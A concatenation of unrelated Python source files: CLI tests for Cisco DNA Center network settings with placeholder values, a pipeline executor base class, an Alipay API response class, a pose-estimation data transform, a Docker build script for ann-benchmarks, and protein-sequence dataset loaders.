"""--settings='{"cliCredential": {"description": "string", "username": "string", "password": "string", "enablePassword": "string", "id": "string"}, "snmpV2cRead": {"description": "string", "readCommunity": "string", "id": "string"}, "snmpV2cWrite": {"description": "string", "writeCommunity": "string", "id": "string"}, "snmpV3": {"authPassword": "string", "authType": "string", "snmpMode": "string", "privacyPassword": "string", "privacyType": "string", "username": "string", "description": "string", "id": "string"}, "httpsRead": {"name": "string", "username": "string", "password": "string", "port": "string", "id": "string"}, "httpsWrite": {"name": "string", "username": "string", "password": "string", "port": "string", "id": "string"}}'"""])
assert not result.exception
assert is_valid_update_device_credentials(result)
def is_valid_update_network(result):
data = result.output.strip()
return True if data else False
@pytest.mark.network_settings
def test_update_network(runner, cli, auth_options):
result = runner.invoke(cli, ['-v', '1.3.3', *auth_options,
'network-settings', 'update-network',
"""--active_validation=True""",
"""--payload=None""",
"""--settings='{"dhcpServer": ["string"], "dnsServer": {"domainName": "can only contain alphanumeric characters or hyphen", "primaryIpAddress": "valid range : 1.0.0.0 - 223.255.255.255", "secondaryIpAddress": "valid range : 1.0.0.0 - 223.255.255.255"}, "syslogServer": {"ipAddresses": ["string"], "configureDnacIP": true}, "snmpServer": {"ipAddresses": ["string"], "configureDnacIP": true}, "netflowcollector": {"ipAddress": "string", "port": 0}, "ntpServer": ["string"], "timezone": "string", "messageOfTheday": {"bannerMessage": "string", "retainExistingBanner": true}, "network_aaa": {"servers": "Server type supported by ISE and AAA", "ipAddress": "Mandatory for ISE servers and for AAA consider this as additional Ip.", "network": "For AAA server consider it as primary IP and For ISE consider as Network", "protocol": "string", "sharedSecret": "Supported only by ISE servers"}, "clientAndEndpoint_aaa": {"servers": "string", "ipAddress": "Mandatory for ISE servers.", "network": "string", "protocol": "string", "sharedSecret": "Supported only by ISE servers"}}'""",
"""--site_id='string'"""])
assert not result.exception
assert is_valid_update_network(result)
def is_valid_get_service_provider_details(result):
data = result.output.strip()
return True if data else False
@pytest.mark.network_settings
def test_get_service_provider_details(runner, cli, auth_options):
result = runner.invoke(cli, ['-v', '1.3.3', *auth_options,
'network-settings', 'get-service-provider-details',
"""--"""])
assert not result.exception
assert is_valid_get_service_provider_details(result)
def is_valid_get_device_credential_details(result):
data = result.output.strip()
return True if data else False
@pytest.mark.network_settings
def test_get_device_credential_details(runner, cli, auth_options):
result = runner.invoke(cli, ['-v', '1.3.3', *auth_options,
'network-settings', 'get-device-credential-details',
"""--site_id='string'"""])
assert not result.exception
assert is_valid_get_device_credential_details(result)
def is_valid_create_sp_profile(result):
data = result.output.strip()
return True if data else False
@pytest.mark.network_settings
def test_create_sp_profile(runner, cli, auth_options):
result = runner.invoke(cli, ['-v', '1.3.3', *auth_options,
'network-settings', 'create-sp-profile',
"""--active_validation=True""",
"""--payload=None""",
"""--settings='{"qos": [{"profileName": "string", "model": "string", "wanProvider": "string"}]}'"""])
assert not result.exception
assert is_valid_create_sp_profile(result)
def is_valid_get_global_pool(result):
data = result.output.strip()
return True if data else False
@pytest.mark.network_settings
def test_get_global_pool(runner, cli, auth_options):
result = runner.invoke(cli, ['-v', '1.3.3', *auth_options,
'network-settings', 'get-global-pool',
"""--limit='string'""",
"""--offset='string'"""])
assert not result.exception
assert is_valid_get_global_pool(result)
def is_valid_create_network(result):
data = result.output.strip()
return True if data else False
@pytest.mark.network_settings
def test_create_network(runner, cli, auth_options):
result = runner.invoke(cli, ['-v', '1.3.3', *auth_options,
'network-settings', 'create-network',
"""--active_validation=True""",
"""--payload=None""",
"""--settings='{"dhcpServer": ["string"], "dnsServer": {"domainName": "can only contain alphanumeric characters or hyphen", "primaryIpAddress": "valid range : 1.0.0.0 - 223.255.255.255", "secondaryIpAddress": "valid range : 1.0.0.0 - 223.255.255.255"}, "syslogServer": {"ipAddresses": ["string"], "configureDnacIP": true}, "snmpServer": {"ipAddresses": ["string"], "configureDnacIP": true}, "netflowcollector": {"ipAddress": "string", "port": 0}, "ntpServer": ["string"], "timezone": "string", "messageOfTheday": {"bannerMessage": "string", "retainExistingBanner": true}, "network_aaa": {"servers": "Server type supported by ISE and AAA", "ipAddress": "Mandatory for ISE servers and for AAA consider this as additional Ip.", "network": "For AAA server consider it as primary IP and For ISE consider as Network", "protocol": "string", "sharedSecret": "Supported only by ISE servers"}, "clientAndEndpoint_aaa": {"servers": "string", "ipAddress": "Mandatory for ISE servers.", "network": "string", "protocol": "string", "sharedSecret": "Supported only by ISE servers"}}'""",
"""--site_id='string'"""])
assert not result.exception
assert is_valid_create_network(result)
def is_valid_create_device_credentials(result):
data = result.output.strip()
return True if data else False
@pytest.mark.network_settings
def test_create_device_credentials(runner, cli, auth_options):
result = runner.invoke(cli, ['-v', '1.3.3', *auth_options,
'network-settings', 'create-device-credentials',
"""--active_validation=True""",
"""--payload=None""",
"""--settings='{"cliCredential": [{"description": "string", "username": "string", "password": "string", "enablePassword": "string"}], "snmpV2cRead": [{"description": "string", "readCommunity": "string"}], "snmpV2cWrite": [{"description": "string", "writeCommunity": "string"}], "snmpV3": [{"description": "string", "username": "string", "privacyType": "AES128", "privacyPassword": "string", "authType": "SHA", "authPassword": "string", "snmpMode": "AUTHPRIV"}], "httpsRead": [{"name": "string", "username": "string", "password": "string", "port": 0}], "httpsWrite": [{"name": "string", "username": "string", "password": "string", "port": 0}]}'"""])
assert not result.exception
assert is_valid_create_device_credentials(result)
def is_valid_create_global_pool(result):
data = result.output.strip()
return True if data else False
@pytest.mark.network_settings
def test_create_global_pool(runner, cli, auth_options):
result = runner.invoke(cli, ['-v', '1.3.3', *auth_options,
'network-settings', 'create-global-pool',
"""--active_validation=True""",
"""--payload=None""",
"""--settings='{"ippool": [{"ipPoolName": "string", "type": "Generic", "ipPoolCidr": "string", "gateway": "string", "dhcpServerIps": ["string"], "dnsServerIps": ["string"], "IpAddressSpace": "IPv6 or IPv4"}]}'"""])
assert not result.exception
assert is_valid_create_global_pool(result)
|
#!/usr/bin/env/python3
#
# Copyright (c) Facebook, Inc. and its affiliates.
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Pipeline Base Executor class."""
import abc
import logging
from six import with_metaclass
class BaseExecutor(with_metaclass(abc.ABCMeta, object)): # pylint: disable=R0903
"""Pipeline Base Executor abstract class."""
def __init__(self):
pass # pylint: disable=W0107
@abc.abstractmethod
def Do(self, input_dict: dict, output_dict: dict, exec_properties: dict): # pylint: disable=C0103
"""A Do function that does nothing."""
pass # pylint: disable=W0107
def _log_startup(
self, input_dict: dict, output_dict: dict, exec_properties
):
"""Log inputs, outputs, and executor properties in a standard
format."""
class_name = self.__class__.__name__
logging.debug("Starting %s execution.", class_name)
logging.debug("Inputs for %s are: %s .", class_name, input_dict)
logging.debug("Outputs for %s are: %s.", class_name, output_dict)
logging.debug(
"Execution Properties for %s are: %s",
class_name, exec_properties)
|
"""
Check utilities.sorting
"""
import sys
import os
import unittest
from pedal.utilities.progsnap import SqlProgSnap2
sys.path.insert(0, os.path.abspath(os.path.join(os.path.dirname(__file__), '..')))
here = "" if os.path.basename(os.getcwd()) == "tests" else "tests/"
class TestProgsnap(unittest.TestCase):
def test_progsnap_sort(self):
progsnap = SqlProgSnap2(here+"datafiles/progsnap2_3.db")
link_filters = {
'Subject': {
'X-IsStaff': "False",
},
'Assignment': {
'X-Name': "Fun%"
},
}
link_selections = {
'Subject': {
'X-Email': 'student_email',
'X-Name.First': 'student_first',
'X-Name.Last': 'student_last',
},
'Assignment': {
'X-Name': 'assignment_name',
'X-URL': 'assignment_url',
'X-Code.OnRun': 'on_run'
}
}
fun_student_edits = progsnap.get_events(
event_filter={'EventType': 'File.Edit'},
link_filters=link_filters,
link_selections=link_selections
)
self.assertEqual(212, len(fun_student_edits))
self.assertIsInstance(fun_student_edits[0], dict)
self.assertEqual("592", fun_student_edits[0]['event_id'])
if __name__ == '__main__':
unittest.main(buffer=False)
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import simplejson as json
from alipay.aop.api.response.AlipayResponse import AlipayResponse
from alipay.aop.api.domain.OpenBatch import OpenBatch
class KoubeiQualityTestCloudacptBatchQueryResponse(AlipayResponse):
def __init__(self):
super(KoubeiQualityTestCloudacptBatchQueryResponse, self).__init__()
self._activity_id = None
self._batch_list = None
self._batch_num = None
@property
def activity_id(self):
return self._activity_id
@activity_id.setter
def activity_id(self, value):
self._activity_id = value
@property
def batch_list(self):
return self._batch_list
@batch_list.setter
def batch_list(self, value):
if isinstance(value, list):
self._batch_list = list()
for i in value:
if isinstance(i, OpenBatch):
self._batch_list.append(i)
else:
self._batch_list.append(OpenBatch.from_alipay_dict(i))
@property
def batch_num(self):
return self._batch_num
@batch_num.setter
def batch_num(self, value):
self._batch_num = value
def parse_response_content(self, response_content):
response = super(KoubeiQualityTestCloudacptBatchQueryResponse, self).parse_response_content(response_content)
if 'activity_id' in response:
self.activity_id = response['activity_id']
if 'batch_list' in response:
self.batch_list = response['batch_list']
if 'batch_num' in response:
self.batch_num = response['batch_num']
|
import math
import random
import cv2
import numpy as np
import torch
from ..bbox import _box_to_center_scale, _center_scale_to_box
from ..transforms import (addDPG, affine_transform, flip_joints_3d,
get_affine_transform, im_to_torch)
class SimpleTransform(object):
"""Generation of cropped input person and pose heatmaps from SimplePose.
Parameters
----------
img: torch.Tensor
A tensor with shape: `(3, h, w)`.
label: dict
A dictionary with 4 keys:
`bbox`: [xmin, ymin, xmax, ymax]
`joints_3d`: numpy.ndarray with shape: (n_joints, 2),
including position and visible flag
`width`: image width
`height`: image height
dataset:
The dataset to be transformed, must include `joint_pairs` property for flipping.
scale_factor: int
Scale augmentation.
input_size: tuple
Input image size, as (height, width).
output_size: tuple
Heatmap size, as (height, width).
rot: int
Ratation augmentation.
train: bool
True for training trasformation.
"""
def __init__(self, dataset, scale_factor, color_factor, occlusion, add_dpg,
input_size, output_size, rot, sigma,
train, loss_type='MSELoss', dict_output=False):
self._joint_pairs = dataset.joint_pairs
self._scale_factor = scale_factor
self._color_factor = color_factor
self._occlusion = occlusion
self._rot = rot
self._add_dpg = add_dpg
self._input_size = input_size
self._heatmap_size = output_size
self._sigma = sigma
self._train = train
self._loss_type = loss_type
self._aspect_ratio = float(input_size[1]) / input_size[0] # w / h
self._feat_stride = np.array(input_size) / np.array(output_size)
self.pixel_std = 1
self.dict_output = dict_output
if train:
self.num_joints_half_body = dataset.num_joints_half_body
self.prob_half_body = dataset.prob_half_body
self.upper_body_ids = dataset.upper_body_ids
self.lower_body_ids = dataset.lower_body_ids
def test_transform(self, src, bbox):
xmin, ymin, xmax, ymax = bbox
center, scale = _box_to_center_scale(
xmin, ymin, xmax - xmin, ymax - ymin, self._aspect_ratio)
scale = scale * 1.0
input_size = self._input_size
inp_h, inp_w = input_size
trans = get_affine_transform(center, scale, 0, [inp_w, inp_h])
img = cv2.warpAffine(src, trans, (int(inp_w), int(inp_h)), flags=cv2.INTER_LINEAR)
bbox = _center_scale_to_box(center, scale)
img = im_to_torch(img)
# mean
img[0].add_(-0.406)
img[1].add_(-0.457)
img[2].add_(-0.480)
# std
img[0].div_(0.225)
img[1].div_(0.224)
img[2].div_(0.229)
return img, bbox
def _target_generator(self, joints_3d, num_joints):
target_weight = np.ones((num_joints, 1), dtype=np.float32)
target_weight[:, 0] = joints_3d[:, 0, 1]
target = np.zeros((num_joints, self._heatmap_size[0], self._heatmap_size[1]),
dtype=np.float32)
tmp_size = self._sigma * 3
for i in range(num_joints):
mu_x = int(joints_3d[i, 0, 0] / self._feat_stride[0] + 0.5)
mu_y = int(joints_3d[i, 1, 0] / self._feat_stride[1] + 0.5)
# check if any part of the gaussian is in-bounds
ul = [int(mu_x - tmp_size), int(mu_y - tmp_size)]
br = [int(mu_x + tmp_size + 1), int(mu_y + tmp_size + 1)]
if (ul[0] >= self._heatmap_size[1] or ul[1] >= self._heatmap_size[0] or br[0] < 0 or br[1] < 0):
# return image as is
target_weight[i] = 0
continue
# generate gaussian
size = 2 * tmp_size + 1
x = np.arange(0, size, 1, np.float32)
y = x[:, np.newaxis]
x0 = y0 = size // 2
# the gaussian is not normalized, we want the center value to be equal to 1
g = np.exp(-((x - x0) ** 2 + (y - y0) ** 2) / (2 * (self._sigma ** 2)))
# usable gaussian range
g_x = max(0, -ul[0]), min(br[0], self._heatmap_size[1]) - ul[0]
g_y = max(0, -ul[1]), min(br[1], self._heatmap_size[0]) - ul[1]
# image range
img_x = max(0, ul[0]), min(br[0], self._heatmap_size[1])
img_y = max(0, ul[1]), min(br[1], self._heatmap_size[0])
v = target_weight[i]
if v > 0.5:
target[i, img_y[0]:img_y[1], img_x[0]:img_x[1]] = g[g_y[0]:g_y[1], g_x[0]:g_x[1]]
return target, np.expand_dims(target_weight, -1)
def _integral_target_generator(self, joints_3d, num_joints, patch_height, patch_width):
target_weight = np.ones((num_joints, 2), dtype=np.float32)
target_weight[:, 0] = joints_3d[:, 0, 1]
target_weight[:, 1] = joints_3d[:, 0, 1]
target = np.zeros((num_joints, 2), dtype=np.float32)
target[:, 0] = joints_3d[:, 0, 0] / patch_width - 0.5
target[:, 1] = joints_3d[:, 1, 0] / patch_height - 0.5
target = target.reshape((-1))
target_weight = target_weight.reshape((-1))
return target, target_weight
def __call__(self, src, label):
if label['bbox'] is not None:
bbox = list(label['bbox'])
else:
bbox = None
gt_joints = label['joints_3d']
imgwidth, imght = label['width'], label['height']
assert imgwidth == src.shape[1] and imght == src.shape[0]
self.num_joints = gt_joints.shape[0]
joints_vis = np.zeros((self.num_joints, 1), dtype=np.float32)
joints_vis[:, 0] = gt_joints[:, 0, 1]
input_size = self._input_size
if self._add_dpg and self._train:
bbox = addDPG(bbox, imgwidth, imght)
if bbox is not None:
xmin, ymin, xmax, ymax = bbox
center, scale = _box_to_center_scale(
xmin, ymin, xmax - xmin, ymax - ymin, self._aspect_ratio)
else:
center = np.array([imgwidth / 2, imght / 2], dtype=np.float32)
scale = np.array([imgwidth, imght], dtype=np.float32)
# half body transform
if self._train and (np.sum(joints_vis[:, 0]) > self.num_joints_half_body and np.random.rand() < self.prob_half_body):
c_half_body, s_half_body = self.half_body_transform(
gt_joints[:, :, 0], joints_vis
)
if c_half_body is not None and s_half_body is not None:
center, scale = c_half_body, s_half_body
# rescale
if self._train:
sf = self._scale_factor
scale = scale * np.clip(np.random.randn() * sf + 1, 1 - sf, 1 + sf)
else:
scale = scale * 1.0
# rotation
if self._train:
rf = self._rot
r = np.clip(np.random.randn() * rf, -rf * 2, rf * 2) if random.random() <= 0.6 else 0
else:
r = 0
if self._train and self._occlusion and bbox is not None:
while True:
area_min = 0.0
area_max = 0.7
synth_area = (random.random() * (area_max - area_min) + area_min) * (xmax - xmin) * (ymax - ymin)
ratio_min = 0.3
ratio_max = 1 / 0.3
synth_ratio = (random.random() * (ratio_max - ratio_min) + ratio_min)
synth_h = math.sqrt(synth_area * synth_ratio)
synth_w = math.sqrt(synth_area / synth_ratio)
synth_xmin = random.random() * ((xmax - xmin) - synth_w - 1) + xmin
synth_ymin = random.random() * ((ymax - ymin) - synth_h - 1) + ymin
if synth_xmin >= 0 and synth_ymin >= 0 and synth_xmin + synth_w < imgwidth and synth_ymin + synth_h < imght:
synth_xmin = int(synth_xmin)
synth_ymin = int(synth_ymin)
synth_w = int(synth_w)
synth_h = int(synth_h)
src[synth_ymin:synth_ymin + synth_h, synth_xmin:synth_xmin + synth_w, :] = np.random.rand(synth_h, synth_w, 3) * 255
break
joints = gt_joints
if random.random() > 0.5 and self._train:
# src, fliped = random_flip_image(src, px=0.5, py=0)
# if fliped[0]:
assert src.shape[2] == 3
src = src[:, ::-1, :]
joints = flip_joints_3d(joints, imgwidth, self._joint_pairs)
center[0] = imgwidth - center[0] - 1
inp_h, inp_w = input_size
trans = get_affine_transform(center, scale, r, [inp_w, inp_h])
img = cv2.warpAffine(src, trans, (int(inp_w), int(inp_h)), flags=cv2.INTER_LINEAR)
trans_inv = get_affine_transform(center, scale, r, [inp_w, inp_h], inv=True).astype(np.float32)
intrinsic_param = np.zeros((3, 3)).astype(np.float32)
joint_root = np.zeros((3)).astype(np.float32)
depth_factor = np.array([2000]).astype(np.float32)
# deal with joints visibility
for i in range(self.num_joints):
if joints[i, 0, 1] > 0.0:
joints[i, 0:2, 0] = affine_transform(joints[i, 0:2, 0], trans)
# generate training targets
if self._loss_type == 'MSELoss':
target, target_weight = self._target_generator(joints, self.num_joints)
elif 'LocationLoss' in self._loss_type or 'L1Loss' in self._loss_type:
target, target_weight = self._integral_target_generator(joints, self.num_joints, inp_h, inp_w)
bbox = _center_scale_to_box(center, scale)
assert img.shape[2] == 3
if self._train:
c_high = 1 + self._color_factor
c_low = 1 - self._color_factor
img[:, :, 0] = np.clip(img[:, :, 0] * random.uniform(c_low, c_high), 0, 255)
img[:, :, 1] = np.clip(img[:, :, 1] * random.uniform(c_low, c_high), 0, 255)
img[:, :, 2] = np.clip(img[:, :, 2] * random.uniform(c_low, c_high), 0, 255)
img = im_to_torch(img)
# mean
img[0].add_(-0.406)
img[1].add_(-0.457)
img[2].add_(-0.480)
# std
img[0].div_(0.225)
img[1].div_(0.224)
img[2].div_(0.229)
if self.dict_output:
output = {
'type': '2d_data',
'image': img,
'target': torch.from_numpy(target).float(),
'target_weight': torch.from_numpy(target_weight).float(),
'trans_inv': torch.from_numpy(trans_inv).float(),
'intrinsic_param': torch.from_numpy(intrinsic_param).float(),
'joint_root': torch.from_numpy(joint_root).float(),
'depth_factor': torch.from_numpy(depth_factor).float(),
'bbox': torch.Tensor(bbox)
}
return output
else:
return img, torch.from_numpy(target), torch.from_numpy(target_weight), torch.Tensor(bbox)
def half_body_transform(self, joints, joints_vis):
upper_joints = []
lower_joints = []
for joint_id in range(self.num_joints):
if joints_vis[joint_id][0] > 0:
if joint_id in self.upper_body_ids:
upper_joints.append(joints[joint_id])
else:
lower_joints.append(joints[joint_id])
if np.random.randn() < 0.5 and len(upper_joints) > 2:
selected_joints = upper_joints
else:
selected_joints = lower_joints \
if len(lower_joints) > 2 else upper_joints
if len(selected_joints) < 2:
return None, None
selected_joints = np.array(selected_joints, dtype=np.float32)
center = selected_joints.mean(axis=0)[:2]
left_top = np.amin(selected_joints, axis=0)
right_bottom = np.amax(selected_joints, axis=0)
w = right_bottom[0] - left_top[0]
h = right_bottom[1] - left_top[1]
if w > self._aspect_ratio * h:
h = w * 1.0 / self._aspect_ratio
elif w < self._aspect_ratio * h:
w = h * self._aspect_ratio
scale = np.array(
[
w * 1.0 / self.pixel_std,
h * 1.0 / self.pixel_std
],
dtype=np.float32
)
scale = scale * 1.5
return center, scale
|
import docker
import json
import os
import sys
client = docker.from_env()
print('Building base image...')
client.images.build(path=os.getcwd(), tag='ann-benchmarks', rm=True, dockerfile='install/Dockerfile')
def build(library):
print('Building %s...' % library)
try:
client.images.build(path=os.getcwd(), tag='ann-benchmarks-%s' % library, rm=True, dockerfile='install/Dockerfile.%s' % library)
except docker.errors.BuildError as err:
print("Build error: {0}".format(err))
if os.getenv('LIBRARY'):
build(os.getenv('LIBRARY'))
else:
for fn in os.listdir('install'):
if fn.startswith('Dockerfile.'):
build(fn.split('.')[-1])
|
from typing import Union
from pathlib import Path
import lmdb
import subprocess
import string
import json
import os
from os import path
import pickle as pkl
from scipy.spatial.distance import squareform, pdist
import numpy as np
import torch
from torch.utils.data import Dataset
import pandas as pd
from sequence_models.utils import Tokenizer
from sequence_models.constants import trR_ALPHABET, DIST_BINS, PHI_BINS, THETA_BINS, OMEGA_BINS
from sequence_models.gnn import bins_to_vals
from sequence_models.pdb_utils import process_coords
class LMDBDataset(Dataset):
"""Creates a dataset from an lmdb file.
Args:
data_file (Union[str, Path]): Path to lmdb file.
in_memory (bool, optional): Whether to load the full dataset into memory.
Default: False.
"""
def __init__(self,
data_file: Union[str, Path],
in_memory: bool = False):
data_file = Path(data_file)
if not data_file.exists():
raise FileNotFoundError(data_file)
env = lmdb.open(str(data_file), max_readers=1, readonly=True,
lock=False, readahead=False, meminit=False)
with env.begin(write=False) as txn:
num_examples = pkl.loads(txn.get(b'num_examples'))
if in_memory:
cache = [None] * num_examples
self._cache = cache
self._env = env
self._in_memory = in_memory
self._num_examples = num_examples
def __len__(self) -> int:
return self._num_examples
def __getitem__(self, index: int):
if not 0 <= index < self._num_examples:
raise IndexError(index)
if self._in_memory and self._cache[index] is not None:
item = self._cache[index]
else:
with self._env.begin(write=False) as txn:
item = pkl.loads(txn.get(str(index).encode()))
if 'id' not in item:
item['id'] = str(index)
if self._in_memory:
self._cache[index] = item
return item
class TAPEDataset(Dataset):
def __init__(self,
data_path: Union[str, Path],
data_type: str,
split: str,
sub_type : str = 'distance',
eps : float = 1e-6,
in_memory: bool = False,
max_len=700):
"""
data_path : path to data directory
data_type : name of downstream task, [fluorescence, stability, remote_homology,
secondary_structure, contact]
split : data split to load
contact_method : if data_type == contact, choose 'distance' to get
distance instead of binary contact output
"""
self.data_type = data_type
self.sub_type = sub_type
self.eps = eps
self.max_len = max_len
if data_type == 'fluorescence':
if split not in ('train', 'valid', 'test'):
raise ValueError(f"Unrecognized split: {split}. "
f"Must be one of ['train', 'valid', 'test']")
data_file = Path(data_path + f'fluorescence_{split}.lmdb')
self.output_label = 'log_fluorescence'
if data_type == 'stability':
if split not in ('train', 'valid', 'test'):
raise ValueError(f"Unrecognized split: {split}. "
f"Must be one of ['train', 'valid', 'test']")
data_file = Path(data_path + f'stability_{split}.lmdb')
self.output_label = 'stability_score'
if data_type == 'remote_homology':
if split not in ('train', 'valid', 'test_fold_holdout',
'test_family_holdout', 'test_superfamily_holdout'):
raise ValueError(f"Unrecognized split: {split}. Must be one of "
f"['train', 'valid', 'test_fold_holdout', "
f"'test_family_holdout', 'test_superfamily_holdout']")
data_file = Path(data_path + f'remote_homology_{split}.lmdb')
self.output_label = 'fold_label'
if data_type == 'secondary_structure':
if split not in ('train', 'valid', 'casp12', 'ts115', 'cb513'):
raise ValueError(f"Unrecognized split: {split}. Must be one of "
f"['train', 'valid', 'casp12', "
f"'ts115', 'cb513']")
data_file = Path(data_path + f'secondary_structure_{split}.lmdb')
if self.sub_type == 'ss8':
self.output_label = 'ss8'
else:
self.output_label = 'ss3'
if data_type == 'contact':
if split not in ('train', 'train_unfiltered', 'valid', 'test'):
raise ValueError(f"Unrecognized split: {split}. Must be one of "
f"['train', 'train_unfiltered', 'valid', 'test']")
data_file = Path(data_path + f'proteinnet_{split}.lmdb')
self.output_label = 'tertiary'
self.data = LMDBDataset(data_file, in_memory)
def __len__(self) -> int:
return len(self.data)
def __getitem__(self, index: int):
item = self.data[index]
primary = item['primary']
mask = None
if self.data_type in ['fluorescence', 'stability', ]:
output = float(item[self.output_label][0])
if self.data_type in ['remote_homology']:
output = item[self.output_label]
diff = max(len(primary) - self.max_len + 1, 1)
start = np.random.choice(diff)
end = start + self.max_len
primary = primary[start: end]
if self.data_type in ['secondary_structure']:
# pad with -1s because of cls/sep tokens
output = torch.Tensor(item[self.output_label],).to(torch.int8)
diff = max(len(primary) - self.max_len + 1, 1)
start = np.random.choice(diff)
end = start + self.max_len
primary = primary[start: end]
output = output[start:end]
if self.data_type in ['contact']:
# -1 is ignore, 0 in no contact, 1 is contact
valid_mask = item['valid_mask']
distances = squareform(pdist(item[self.output_label]))
yind, xind = np.indices(distances.shape)
invalid_mask = ~(valid_mask[:, None] & valid_mask[None, :])
invalid_mask |= np.abs(yind - xind) < 6
if self.sub_type == 'distance':
output = torch.tensor(np.exp(-distances ** 2 / 64))
else:
contact_map = np.less(distances, 8.0).astype(np.int64)
contact_map[invalid_mask] = -1
contact_map = torch.Tensor(contact_map).to(torch.int8)
output = torch.tensor(contact_map)
mask = torch.tensor(~invalid_mask)
diff = max(len(primary) - self.max_len + 1, 1)
start = np.random.choice(diff)
end = start + self.max_len
primary = primary[start: end]
output = output[start:end, start:end]
mask = mask[start:end, start:end]
return primary, output, mask
class CSVDataset(Dataset):
def __init__(self, fpath=None, df=None, split=None, outputs=[], max_len=np.inf):
if df is None:
self.data = pd.read_csv(fpath)
else:
self.data = df
if split is not None:
self.data = self.data[self.data['split'] == split]
self.outputs = outputs
self.data = self.data[['sequence'] + self.outputs]
self.max_len = max_len
def __len__(self):
return len(self.data)
def __getitem__(self, idx):
row = self.data.iloc[idx]
sequence = row['sequence']
if len(sequence) > self.max_len:
start = np.random.choice(len(sequence) - self.max_len)
stop = start + self.max_len
sequence = sequence[start:stop]
return [sequence, *row[self.outputs]]
class FlatDataset(Dataset):
def __init__(self, fpath, offsets, cols=[1]):
self.fpath = fpath
self.offsets = offsets
self.cols = cols
def __len__(self):
return len(self.offsets)
def __getitem__(self, idx):
with open(self.fpath, 'r') as f:
f.seek(self.offsets[idx])
line = f.readline()[:-1] # strip the \n
line = line.split(',')
return [line[i] for i in self.cols]
class FFDataset(Dataset):
def __init__(self, stem, max_len=np.inf, tr_only=True):
self.index = stem + 'ffindex'
self.data = stem + 'ffdata'
result = subprocess.run(['wc', '-l', self.index], stdout=subprocess.PIPE)
self.length = int(result.stdout.decode('utf-8').split(' ')[0])
self.tokenizer = Tokenizer(trR_ALPHABET)
self.table = str.maketrans(dict.fromkeys(string.ascii_lowercase))
self.max_len = max_len
self.tr_only = tr_only
def __len__(self):
return self.length
def __getitem__(self, idx):
result = subprocess.run(['ffindex_get', self.data, self.index, '-n', str(idx + 1)],
stdout=subprocess.PIPE)
a3m = result.stdout.decode('utf-8')
seqs = []
for line in a3m.split('\n'):
# skip labels
if len(line) == 0:
continue
if line[0] == '#':
continue
if line[0] != '>':
# remove lowercase letters and right whitespaces
s = line.rstrip().translate(self.table)
if self.tr_only:
s = ''.join([a if a in trR_ALPHABET else '-' for a in s])
if len(s) > self.max_len:
return torch.tensor([])
seqs.append(s)
seqs = torch.tensor([self.tokenizer.tokenize(s) for s in seqs])
return seqs
def trr_bin(dist, omega, theta, phi):
dist = torch.tensor(np.digitize(dist, DIST_BINS[1:]) % (len(DIST_BINS) - 1))
idx = np.where(omega == omega)
jdx = np.where(omega[idx] < 0)[0]
idx = tuple(i[jdx] for i in idx)
omega[idx] = 2 * np.pi + omega[idx]
omega = torch.tensor(np.digitize(omega, OMEGA_BINS[1:]) % (len(OMEGA_BINS) - 1))
idx = np.where(theta == theta)
jdx = np.where(theta[idx] < 0)[0]
idx = tuple(i[jdx] for i in idx)
theta[idx] = 2 * np.pi + theta[idx]
theta = torch.tensor(np.digitize(theta, THETA_BINS[1:]) % (len(THETA_BINS) - 1))
phi = torch.tensor(np.digitize(phi, PHI_BINS[1:]) % (len(PHI_BINS) - 1))
idx = torch.where(dist == 0)
omega[idx] = 0
theta[idx] = 0
phi[idx] = 0
return dist, omega, theta, phi
class UniRefDataset(Dataset):
"""
Dataset that pulls from UniRef/Uniclust downloads.
The data folder should contain the following:
- 'consensus.fasta': consensus sequences, no line breaks in sequences
- 'splits.json': a dict with keys 'train', 'valid', and 'test' mapping to lists of indices
- 'lengths_and_offsets.npz': byte offsets for the 'consensus.fasta' and sequence lengths
"""
def __init__(self, data_dir: str, split: str, structure=False, pdb=False, coords=False, bins=False,
p_drop=0.0, max_len=2048):
self.data_dir = data_dir
self.split = split
self.structure = structure
self.coords = coords
with open(data_dir + 'splits.json', 'r') as f:
self.indices = json.load(f)[self.split]
metadata = np.load(self.data_dir + 'lengths_and_offsets.npz')
self.offsets = metadata['seq_offsets']
self.pdb = pdb
self.bins = bins
if self.pdb or self.bins:
self.n_digits = 6
else:
self.n_digits = 8
if self.coords:
with open(data_dir + 'coords.pkl', 'rb') as f:
self.structures = pkl.load(f)
self.p_drop = p_drop
self.max_len = max_len
def __len__(self):
return len(self.indices)
def __getitem__(self, idx):
idx = self.indices[idx]
offset = self.offsets[idx]
with open(self.data_dir + 'consensus.fasta') as f:
f.seek(offset)
consensus = f.readline()[:-1]
if len(consensus) - self.max_len > 0:
start = np.random.choice(len(consensus) - self.max_len)
stop = start + self.max_len
else:
start = 0
stop = len(consensus)
if self.coords:
coords = self.structures[str(idx)]
dist, omega, theta, phi = process_coords(coords)
dist = torch.tensor(dist).float()
omega = torch.tensor(omega).float()
theta = torch.tensor(theta).float()
phi = torch.tensor(phi).float()
elif self.structure:
sname = 'structures/{num:{fill}{width}}.npz'.format(num=idx, fill='0', width=self.n_digits)
fname = self.data_dir + sname
if path.isfile(fname):
structure = np.load(fname)
else:
structure = None
if structure is not None:
if np.random.random() < self.p_drop:
structure = None
elif self.pdb:
dist = torch.tensor(structure['dist']).float()
omega = torch.tensor(structure['omega']).float()
theta = torch.tensor(structure['theta']).float()
phi = torch.tensor(structure['phi']).float()
if self.bins:
dist, omega, theta, phi = trr_bin(dist, omega, theta, phi)
else:
dist, omega, theta, phi = bins_to_vals(data=structure)
if structure is None:
dist, omega, theta, phi = bins_to_vals(L=len(consensus))
if self.structure or self.coords:
consensus = consensus[start:stop]
dist = dist[start:stop, start:stop]
omega = omega[start:stop, start:stop]
theta = theta[start:stop, start:stop]
phi = phi[start:stop, start:stop]
return consensus, dist, omega, theta, phi
consensus = consensus[start:stop]
return (consensus, )
class TRRDataset(Dataset):
def __init__(self, data_dir, dataset, return_msa=True, bin=True, untokenize=False, max_len=2048):
"""
Args:
data_dir: str,
path to trRosetta data
dataset: str,
train, valid
return_msa: bool
return full MSA or single sequence
bin: bool
bin structure matrices
tokenizer:
Use this to untokenize sequence if desired
"""
filenames = data_dir + dataset + 'list.txt'
self.filenames = np.loadtxt(filenames, dtype=str)
